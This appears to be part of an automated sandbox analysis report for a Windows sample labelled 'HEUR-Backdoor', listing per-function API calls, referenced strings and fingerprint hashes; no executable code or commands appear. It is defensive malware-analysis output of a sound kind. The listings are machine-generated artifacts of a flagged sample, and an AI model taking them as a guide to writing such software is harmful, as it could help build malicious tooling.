                                                • Instruction ID: e01ff69d988f32f405cdc6a8a87b7a0864f5d6ca1fb849660390a54816a129ab
                                                • Instruction Fuzzy Hash: 8A41D232A00308DFCB28DF78C885A6EB7A5FF89714F1545A9E615EB351DB35AD01CB80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,007F895F,007F85FB,?,007F8FD3,00000001,00000364,?,007F3713,00000050,?,00810EE8,00000200), ref: 007F902E
                                                • _free.LIBCMT ref: 007F9063
                                                • _free.LIBCMT ref: 007F908A
                                                • SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F9097
                                                • SetLastError.KERNEL32(00000000,?,00810EE8,00000200), ref: 007F90A0
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 477b04f646072e427ef754c95c0a5b77f8646cc48748f454798e9240826f5bea
                                                • Instruction ID: 46c65a08872e2b9f45eaba2fbff35b6108297eba7cb67edd9d874518b3b00cc0
                                                • Instruction Fuzzy Hash: 3501F472605A0AABD37267356C89B3B261DBBD07717240024F719D2352EF6C8C014161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007E0A41: ResetEvent.KERNEL32(?), ref: 007E0A53
                                                  • Part of subcall function 007E0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 007E0A67
                                                • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 007E078F
                                                • CloseHandle.KERNEL32(?,?), ref: 007E07A9
                                                • DeleteCriticalSection.KERNEL32(?), ref: 007E07C2
                                                • CloseHandle.KERNEL32(?), ref: 007E07CE
                                                • CloseHandle.KERNEL32(?), ref: 007E07DA
                                                  • Part of subcall function 007E084E: WaitForSingleObject.KERNEL32(?,000000FF,007E0A78,?), ref: 007E0854
                                                  • Part of subcall function 007E084E: GetLastError.KERNEL32(?), ref: 007E0860
                                                Similarity
                                                • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                • String ID:
                                                • API String ID: 1868215902-0
                                                • Opcode ID: d58bc2b223e3bcc63af0d454195868dbecd8cc9f3ef2b5675d6f392aa44b42a1
                                                • Instruction ID: d37bee8c2e939174ddb96fe05599e91ed9dc3e90f01a8842183e1380a66ba874
                                                • Instruction Fuzzy Hash: 7001B571441B44EFCB229B65DC88FC6BBEDFB49710F004529F15A82160CBB56A44CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 007FBF28
                                                  • Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
                                                  • Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506
                                                • _free.LIBCMT ref: 007FBF3A
                                                • _free.LIBCMT ref: 007FBF4C
                                                • _free.LIBCMT ref: 007FBF5E
                                                • _free.LIBCMT ref: 007FBF70
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 534cf692aa93dd10a5c6357b5432697d800278d00ab1b23f0a37a2a935d91a24
                                                • Instruction ID: 26e9412d417fdab8e26a671c34cc08375a5c5dde34b872e9a39614bd62517141
                                                • Opcode Fuzzy Hash: 534cf692aa93dd10a5c6357b5432697d800278d00ab1b23f0a37a2a935d91a24
                                                • Instruction Fuzzy Hash: 53F0FF3350924DE7C6A0EF68EE8AD3773D9FA047107644C09F609D7A10CB28FC808A55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _free.LIBCMT ref: 007F807E
                                                  • Part of subcall function 007F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?), ref: 007F84F4
                                                  • Part of subcall function 007F84DE: GetLastError.KERNEL32(?,?,007FBFA7,?,00000000,?,00000000,?,007FBFCE,?,00000007,?,?,007FC3CB,?,?), ref: 007F8506
                                                • _free.LIBCMT ref: 007F8090
                                                • _free.LIBCMT ref: 007F80A3
                                                • _free.LIBCMT ref: 007F80B4
                                                • _free.LIBCMT ref: 007F80C5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 306ba693f2efc52f3a023301a4cccba2a25c7bb4ccf1093f8394f17e74459972
                                                • Instruction ID: 29924cdddef888e72cdd0f44a06713f42578cab5b804fb6f7e64ae0008533d71
                                                • Opcode Fuzzy Hash: 306ba693f2efc52f3a023301a4cccba2a25c7bb4ccf1093f8394f17e74459972
                                                • Instruction Fuzzy Hash: 58F03AB6805169CBCBD1AF59FC0A4273B65F764B203084E0AFA0097B70DF3908519FC2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __EH_prolog.LIBCMT ref: 007D7579
                                                  • Part of subcall function 007D3B3D: __EH_prolog.LIBCMT ref: 007D3B42
                                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 007D7640
                                                  • Part of subcall function 007D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 007D7C04
                                                  • Part of subcall function 007D7BF5: GetLastError.KERNEL32 ref: 007D7C4A
                                                  • Part of subcall function 007D7BF5: CloseHandle.KERNEL32(?), ref: 007D7C59
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                • API String ID: 3813983858-639343689
                                                • Opcode ID: 8db7f4274e854334db7d3f829a387124e05b46665d47227123c06c5b9baacd6e
                                                • Instruction ID: ab98934e0be7aef48fdd48c54c30ea1d9ab0a2cf6192a910db743e13e2284ad7
                                                • Opcode Fuzzy Hash: 8db7f4274e854334db7d3f829a387124e05b46665d47227123c06c5b9baacd6e
                                                • Instruction Fuzzy Hash: 5F31C471908248EEDF14EBA4DC49BEE7B7CBF54314F004056F445E7292EBB88A44CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                • EndDialog.USER32(?,00000001), ref: 007EA4B8
                                                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 007EA4CD
                                                • SetDlgItemTextW.USER32(?,00000066,?), ref: 007EA4E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemText$DialogWindow
                                                • String ID: ASKNEXTVOL
                                                • API String ID: 445417207-3402441367
                                                • Opcode ID: 23330e93086a6d5daf68723c631df90328e5e7c2ee9c0b1edc54adad5696d0c2
                                                • Instruction ID: e7d90078dd7ff607d46f4d04b9fcfd22c29ad9367f2418d93f7b494663515d81
                                                • Opcode Fuzzy Hash: 23330e93086a6d5daf68723c631df90328e5e7c2ee9c0b1edc54adad5696d0c2
                                                • Instruction Fuzzy Hash: 7F1181322462C0BFD6219FAD9D4DF6637A9FB8F700F144405F241DA1E0C7A9A906DB22
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: __fprintf_l_strncpy
                                                • String ID: $%s$@%s
                                                • API String ID: 1857242416-834177443
                                                • Opcode ID: 317c00e86b1c25119066f6b867246c4c062bd2f2bcea88454c091a5aa817f7eb
                                                • Instruction ID: f7824fa6635cf0f7c2e879f0d1539af84b1f6f036b34c245599d9223bf7d553c
                                                • Opcode Fuzzy Hash: 317c00e86b1c25119066f6b867246c4c062bd2f2bcea88454c091a5aa817f7eb
                                                • Instruction Fuzzy Hash: 8B213B7254024CAADB319EA4CC4AFEA7BB8FB05300F040513FA15962A1E379EA559B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 007D130B: GetDlgItem.USER32(00000000,00003021), ref: 007D134F
                                                  • Part of subcall function 007D130B: SetWindowTextW.USER32(00000000,008035B4), ref: 007D1365
                                                • EndDialog.USER32(?,00000001), ref: 007EA9DE
                                                • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 007EA9F6
                                                • SetDlgItemTextW.USER32(?,00000067,?), ref: 007EAA24
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ItemText$DialogWindow
                                                • String ID: GETPASSWORD1
                                                • API String ID: 445417207-3292211884
                                                • Opcode ID: e874e7e78d15ef61f40dd56df7e7317ffd993b56e95b0973648977bed5d3732f
                                                • Instruction ID: 6e00c1ec4d0bfe264d6d9fe235a9fb92a686195f5e5218a090f36cffbb4cbfd5
                                                • Opcode Fuzzy Hash: e874e7e78d15ef61f40dd56df7e7317ffd993b56e95b0973648977bed5d3732f
                                                • Instruction Fuzzy Hash: F5114832941218BADB21AE659E09FFA377CFB4D300F004421FA45F2191C268B954D672
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • _swprintf.LIBCMT ref: 007DB51E
                                                  • Part of subcall function 007D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007D401D
                                                • _wcschr.LIBVCRUNTIME ref: 007DB53C
                                                • _wcschr.LIBVCRUNTIME ref: 007DB54C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                • String ID: %c:\
                                                • API String ID: 525462905-3142399695
                                                • Opcode ID: 3f1d3a45c298c6370f6d679cf4928a49add426a04aff017156981f6bdb3dd1c0
                                                • Instruction ID: 574dbc86179958082eaa9fea04252799d57c0d0da80b62082d290f331b487a41
                                                • Opcode Fuzzy Hash: 3f1d3a45c298c6370f6d679cf4928a49add426a04aff017156981f6bdb3dd1c0
                                                • Instruction Fuzzy Hash: F301F953904311FAD720AB75AC8AC7BB7BCDE953A0B914417F986D7281FB38D970C2A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,007DABC5,00000008,?,00000000,?,007DCB88,?,00000000), ref: 007E06F3
                                                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,007DABC5,00000008,?,00000000,?,007DCB88,?,00000000), ref: 007E06FD
                                                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,007DABC5,00000008,?,00000000,?,007DCB88,?,00000000), ref: 007E070D
                                                Strings
                                                • Thread pool initialization failed., xrefs: 007E0725
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                • String ID: Thread pool initialization failed.
                                                • API String ID: 3340455307-2182114853
                                                • Opcode ID: becc8b2b7d996c6fe8a22085f62cbbc0c5956495ddae82f666f126c6bd6cf1f8
                                                • Instruction ID: 71b2d500e79fa9d1f9820aa79c337aacf0b14b7ee424c549aa990a1282c85466
                                                • Opcode Fuzzy Hash: becc8b2b7d996c6fe8a22085f62cbbc0c5956495ddae82f666f126c6bd6cf1f8
                                                • Instruction Fuzzy Hash: 361170B1601709AFD3215F66DC88AA7FBECFB99754F10482EF1DAC2200D6B56981CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                                • API String ID: 0-56093855
                                                • Opcode ID: 4e5b3b9b18b8169b972dfdf522c2839df80b4ee916e570725231adc8efec0ff5
                                                • Instruction ID: 8b2340c5c95419739638204cde179d801592cf2d1378ac32ce94224d5ee5ce0a
                                                • Opcode Fuzzy Hash: 4e5b3b9b18b8169b972dfdf522c2839df80b4ee916e570725231adc8efec0ff5
                                                • Instruction Fuzzy Hash: 6E01F17160228AEFCB219F1AED01A963FADFB1C380B108421F901C2270CA789C50EBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: __alldvrm$_strrchr
                                                • String ID:
                                                • API String ID: 1036877536-0
                                                • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                • Instruction ID: 6cdec5e5323eff8a73ca0ac2e6ebad2d8339aef0d1c5da9077d3c0fbdacbe52f
                                                • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                                                • Instruction Fuzzy Hash: 47A14572A0438A9FDB25CF68C8917BEBBE5FF65310F144169E7859B381C23C9942C751
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,007D80B7,?,?,?), ref: 007DA351
                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,007D80B7,?,?), ref: 007DA395
                                                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,007D80B7,?,?,?,?,?,?,?,?), ref: 007DA416
                                                • CloseHandle.KERNEL32(?,?,00000000,?,007D80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 007DA41D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                 • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: File$Create$CloseHandleTime
                                                • String ID:
                                                • API String ID: 2287278272-0
                                                • Opcode ID: bb68775dfd0cbc7d4287a689cbd9178a72178c0972847b49a27de5baaf6cb257
                                                • Instruction ID: ccbf8bc03a3a98ac0ccb880d929cb9fc10c7e78ad4e3f6f64ec4b1ee1077510c
                                                • Opcode Fuzzy Hash: bb68775dfd0cbc7d4287a689cbd9178a72178c0972847b49a27de5baaf6cb257
                                                • Instruction Fuzzy Hash: 9241AF31288385AAD731DF64DC45BAEBBF9BB95700F04091EB5D093281D7A89A48DB53
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,007F89AD,?,00000000,?,00000001,?,?,00000001,007F89AD,?), ref: 007FC0E6
                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007FC16F
                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,007F67E2,?), ref: 007FC181
                                                • __freea.LIBCMT ref: 007FC18A
                                                  • Part of subcall function 007F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                • String ID:
                                                • API String ID: 2652629310-0
                                                • Opcode ID: 4add49b1bfa35cd67116ef79d557fc619de8079c8d09fa5b9aa6628156d6e22b
                                                • Instruction ID: 02019cece38073e58980655fbc6e8240c129f54166bd93a733ece554380d34be
                                                • Opcode Fuzzy Hash: 4add49b1bfa35cd67116ef79d557fc619de8079c8d09fa5b9aa6628156d6e22b
                                                • Instruction Fuzzy Hash: C031E3B2A0011EABDF268F65DD45DBE7BA5EB44310F140128FD04D7291E739CD60CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 007F251A
                                                  • Part of subcall function 007F2B52: ___AdjustPointer.LIBCMT ref: 007F2B9C
                                                • _UnwindNestedFrames.LIBCMT ref: 007F2531
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 007F2543
                                                • CallCatchBlock.LIBVCRUNTIME ref: 007F2567
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                • String ID:
                                                • API String ID: 2633735394-0
                                                • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                • Instruction ID: dca912c072a35cdc5d770b29e4832baa3e38e736590fad821372bdd509433cc4
                                                • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                                                • Instruction Fuzzy Hash: F501053200010CEBCF129F65CC15EAA3BAAEF58714F158054FA1866221D33AE962ABA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetDC.USER32(00000000), ref: 007E9DBE
                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 007E9DCD
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E9DDB
                                                • ReleaseDC.USER32(00000000,00000000), ref: 007E9DE9
                                                Memory Dump Source
